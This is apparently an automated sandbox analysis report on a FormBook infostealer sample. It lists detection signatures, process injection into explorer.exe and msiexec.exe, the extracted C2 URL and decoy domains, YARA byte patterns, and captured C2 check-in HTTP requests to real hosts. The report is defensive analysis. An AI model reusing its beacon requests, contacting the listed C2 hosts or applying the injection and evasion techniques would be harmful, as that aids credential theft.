Loading ...

Play interactive tourEdit tour

Windows Analysis Report wREFu91LXZ.exe

Overview

General Information

Sample Name:wREFu91LXZ.exe
Analysis ID:452405
MD5:686dc98567009e47eac88e95804b9dde
SHA1:5788c30289d12f69d5cf323049d8d3c3a3e73cda
SHA256:11d84c7f9c579c2e58f4acc04d488d5f1c6cc0439609099eabec42444f5ef952
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wREFu91LXZ.exe (PID: 5912 cmdline: 'C:\Users\user\Desktop\wREFu91LXZ.exe' MD5: 686DC98567009E47EAC88E95804B9DDE)
    • wREFu91LXZ.exe (PID: 492 cmdline: 'C:\Users\user\Desktop\wREFu91LXZ.exe' MD5: 686DC98567009E47EAC88E95804B9DDE)
      • explorer.exe (PID: 3388 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msiexec.exe (PID: 5256 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
          • cmd.exe (PID: 6084 cmdline: /c del 'C:\Users\user\Desktop\wREFu91LXZ.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 3728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.extinctionbrews.com/dy8g/"], "decoy": ["mzyxi-rkah-y.net", "okinawarongnho.com", "qq66520.com", "nimbus.watch", "cwdelrio.com", "regalshopper.com", "avito-payment.life", "jorgeporcayo.com", "galvinsky.digital", "guys-only.com", "asmfruits-almacenes.com", "boatrace-life04.net", "cochez.club", "thelastvictor.net", "janieleconte.com", "ivoirepneus.com", "saludflv.info", "mydreamtv.net", "austinphy.com", "cajunseafoodstcloud.com", "13006608192.com", "clear3media.com", "thegrowclinic.com", "findfoodshop.com", "livegaming.store", "greensei.com", "atmaapothecary.com", "builtbydawn.com", "wthcoffee.com", "melodezu.com", "oikoschain.com", "matcitekids.com", "killrstudio.com", "doityourselfism.com", "monsoonnerd.com", "swissbankmusic.com", "envisionfordheights.com", "invisiongc.net", "aizaibali.com", "professioneconsulenza.net", "chaneabond.com", "theamercianhouseboat.com", "scuolatua.com", "surivaganza.com", "xn--vuq722jwngjre.com", "quiteimediato.space", "ecofingers.com", "manageoceanaccount.com", "cindywillardrealtor.com", "garimpeirastore.online", "tinsley.website", "fitnesstwentytwenty.com", "thenorthgoldline.com", "scuolacounselingroma.com", "iwccgroup.com", "wideawakemomma.com", "anthonysavillemiddleschool.com", "sprinkleresources.com", "ravexim3.com", "onedadtwodudes.com", "shxytl.com", "iriscloudvideo.com", "theshapecreator.com", "vermogenswerte.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.230049818.00000000021A0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000002.230049818.00000000021A0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.230049818.00000000021A0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166c9:$sqlite3step: 68 34 1C 7B E1
    • 0x167dc:$sqlite3step: 68 34 1C 7B E1
    • 0x166f8:$sqlite3text: 68 38 2A 90 C5
    • 0x1681d:$sqlite3text: 68 38 2A 90 C5
    • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
    00000005.00000000.273287950.0000000006399000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000005.00000000.273287950.0000000006399000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x46a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x4191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x47a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x9797:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0xa83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 22 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.1.wREFu91LXZ.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.1.wREFu91LXZ.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.1.wREFu91LXZ.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x166c9:$sqlite3step: 68 34 1C 7B E1
        • 0x167dc:$sqlite3step: 68 34 1C 7B E1
        • 0x166f8:$sqlite3text: 68 38 2A 90 C5
        • 0x1681d:$sqlite3text: 68 38 2A 90 C5
        • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
        1.2.wREFu91LXZ.exe.21a0000.2.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.wREFu91LXZ.exe.21a0000.2.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000001.00000002.230049818.00000000021A0000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.extinctionbrews.com/dy8g/"], "decoy": ["mzyxi-rkah-y.net", "okinawarongnho.com", "qq66520.com", "nimbus.watch", "cwdelrio.com", "regalshopper.com", "avito-payment.life", "jorgeporcayo.com", "galvinsky.digital", "guys-only.com", "asmfruits-almacenes.com", "boatrace-life04.net", "cochez.club", "thelastvictor.net", "janieleconte.com", "ivoirepneus.com", "saludflv.info", "mydreamtv.net", "austinphy.com", "cajunseafoodstcloud.com", "13006608192.com", "clear3media.com", "thegrowclinic.com", "findfoodshop.com", "livegaming.store", "greensei.com", "atmaapothecary.com", "builtbydawn.com", "wthcoffee.com", "melodezu.com", "oikoschain.com", "matcitekids.com", "killrstudio.com", "doityourselfism.com", "monsoonnerd.com", "swissbankmusic.com", "envisionfordheights.com", "invisiongc.net", "aizaibali.com", "professioneconsulenza.net", "chaneabond.com", "theamercianhouseboat.com", "scuolatua.com", "surivaganza.com", "xn--vuq722jwngjre.com", "quiteimediato.space", "ecofingers.com", "manageoceanaccount.com", "cindywillardrealtor.com", "garimpeirastore.online", "tinsley.website", "fitnesstwentytwenty.com", "thenorthgoldline.com", "scuolacounselingroma.com", "iwccgroup.com", "wideawakemomma.com", "anthonysavillemiddleschool.com", "sprinkleresources.com", "ravexim3.com", "onedadtwodudes.com", "shxytl.com", "iriscloudvideo.com", "theshapecreator.com", "vermogenswerte.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: wREFu91LXZ.exeVirustotal: Detection: 31%Perma Link
          Source: wREFu91LXZ.exeReversingLabs: Detection: 53%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 3.1.wREFu91LXZ.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.wREFu91LXZ.exe.21a0000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.wREFu91LXZ.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.wREFu91LXZ.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.wREFu91LXZ.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.wREFu91LXZ.exe.21a0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.230049818.00000000021A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.273287950.0000000006399000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.486466512.0000000000430000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.487707401.0000000004060000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.487516890.0000000002A10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.283872070.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.284026050.0000000000540000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000001.227451103.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.284250937.00000000009D0000.00000040.00000001.sdmp, type: MEMORY
          Machine Learning detection for sampleShow sources
          Source: wREFu91LXZ.exeJoe Sandbox ML: detected
          Source: 10.2.msiexec.exe.48c7960.5.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 10.2.msiexec.exe.22b358.1.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 1.2.wREFu91LXZ.exe.21a0000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.2.wREFu91LXZ.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.1.wREFu91LXZ.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.wREFu91LXZ.exe.680000.1.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: wREFu91LXZ.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
          Source: Binary string: msiexec.pdb source: wREFu91LXZ.exe, 00000003.00000002.284421615.0000000000A40000.00000040.00000001.sdmp
          Source: Binary string: msiexec.pdbGCTL source: wREFu91LXZ.exe, 00000003.00000002.284421615.0000000000A40000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: wREFu91LXZ.exe, 00000001.00000003.226799711.0000000002330000.00000004.00000001.sdmp, wREFu91LXZ.exe, 00000003.00000002.284645298.0000000000C2F000.00000040.00000001.sdmp, msiexec.exe, 0000000A.00000002.487880611.0000000004390000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: wREFu91LXZ.exe, msiexec.exe
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 4x nop then pop esi
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 4x nop then pop ebx
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then pop esi
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then pop edi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49737 -> 52.5.43.61:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49737 -> 52.5.43.61:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49737 -> 52.5.43.61:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49739 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49739 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49739 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49741 -> 50.87.238.189:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49741 -> 50.87.238.189:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49741 -> 50.87.238.189:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49743 -> 50.87.248.20:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49743 -> 50.87.248.20:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49743 -> 50.87.248.20:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.extinctionbrews.com/dy8g/
          Source: global trafficHTTP traffic detected: GET /dy8g/?9rrLUp1=0Hs+m/QFKKZkFwACjLHyI7vfWqidr4y2jXRg5Hngc5JW+skIzqaHxis+6ShLP6A0B+d4&sxlxj=RL30W HTTP/1.1Host: www.chaneabond.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?9rrLUp1=qBaU/+yfeYHlIZouGPofXU4iidVfFInHYvrLlGgOmZTTl18u/I/MgAYEWpA7pfREgQYT&sxlxj=RL30W HTTP/1.1Host: www.melodezu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?9rrLUp1=sC7FhjJqcCFIEoUuEobIBnrRYwOZzG9nc/x6jFk5Keq5TgsKgOpKFfaz6JoBJPzzv7cu&sxlxj=RL30W HTTP/1.1Host: www.cajunseafoodstcloud.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?9rrLUp1=DjnY/S7/G1yk/GGdjnbMG0pwlAlipgBY8a8MDSEvYTAaE8/8s3MkSQswoFjnAjbDmWUu&sxlxj=RL30W HTTP/1.1Host: www.extinctionbrews.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?9rrLUp1=iVPDfBhYBy5JvywJlu7/jTaNaIK/WCHUrbFXeojMH/nMVdHPbpxjQuq5aGN6jhO1pTuT&sxlxj=RL30W HTTP/1.1Host: www.tinsley.websiteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?9rrLUp1=XQ+IsuOG6xtA2RDWfBD5IRfVZekOdoA9gy19PVXp7eWYHk3qJ48ISdkxrcmrsJaPDNZD&sxlxj=RL30W HTTP/1.1Host: www.surivaganza.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?9rrLUp1=dI9eO6GEnVuhhF2IZBGZI9CJMc/scmM0Fs5NmUifzPq1VUdHCmcaYQjC6cJJVTF2eMwa&sxlxj=RL30W HTTP/1.1Host: www.matcitekids.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 198.185.159.144 198.185.159.144
          Source: Joe Sandbox ViewASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
          Source: global trafficHTTP traffic detected: GET /dy8g/?9rrLUp1=0Hs+m/QFKKZkFwACjLHyI7vfWqidr4y2jXRg5Hngc5JW+skIzqaHxis+6ShLP6A0B+d4&sxlxj=RL30W HTTP/1.1Host: www.chaneabond.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?9rrLUp1=qBaU/+yfeYHlIZouGPofXU4iidVfFInHYvrLlGgOmZTTl18u/I/MgAYEWpA7pfREgQYT&sxlxj=RL30W HTTP/1.1Host: www.melodezu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?9rrLUp1=sC7FhjJqcCFIEoUuEobIBnrRYwOZzG9nc/x6jFk5Keq5TgsKgOpKFfaz6JoBJPzzv7cu&sxlxj=RL30W HTTP/1.1Host: www.cajunseafoodstcloud.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?9rrLUp1=DjnY/S7/G1yk/GGdjnbMG0pwlAlipgBY8a8MDSEvYTAaE8/8s3MkSQswoFjnAjbDmWUu&sxlxj=RL30W HTTP/1.1Host: www.extinctionbrews.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?9rrLUp1=iVPDfBhYBy5JvywJlu7/jTaNaIK/WCHUrbFXeojMH/nMVdHPbpxjQuq5aGN6jhO1pTuT&sxlxj=RL30W HTTP/1.1Host: www.tinsley.websiteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?9rrLUp1=XQ+IsuOG6xtA2RDWfBD5IRfVZekOdoA9gy19PVXp7eWYHk3qJ48ISdkxrcmrsJaPDNZD&sxlxj=RL30W HTTP/1.1Host: www.surivaganza.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?9rrLUp1=dI9eO6GEnVuhhF2IZBGZI9CJMc/scmM0Fs5NmUifzPq1VUdHCmcaYQjC6cJJVTF2eMwa&sxlxj=RL30W HTTP/1.1Host: www.matcitekids.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.chaneabond.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 22 Jul 2021 08:09:41 GMTServer: Apache/2.4.18 (Ubuntu)Content-Length: 278Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6d 65 6c 6f 64 65 7a 75 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at www.melodezu.com Port 80</address></body></html>
          Source: explorer.exe, 00000005.00000000.248833107.0000000008A3A000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 3.1.wREFu91LXZ.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.wREFu91LXZ.exe.21a0000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.wREFu91LXZ.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.wREFu91LXZ.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.wREFu91LXZ.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.wREFu91LXZ.exe.21a0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.230049818.00000000021A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.273287950.0000000006399000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.486466512.0000000000430000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.487707401.0000000004060000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.487516890.0000000002A10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.283872070.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.284026050.0000000000540000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000001.227451103.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.284250937.00000000009D0000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 3.1.wREFu91LXZ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.1.wREFu91LXZ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.wREFu91LXZ.exe.21a0000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.wREFu91LXZ.exe.21a0000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
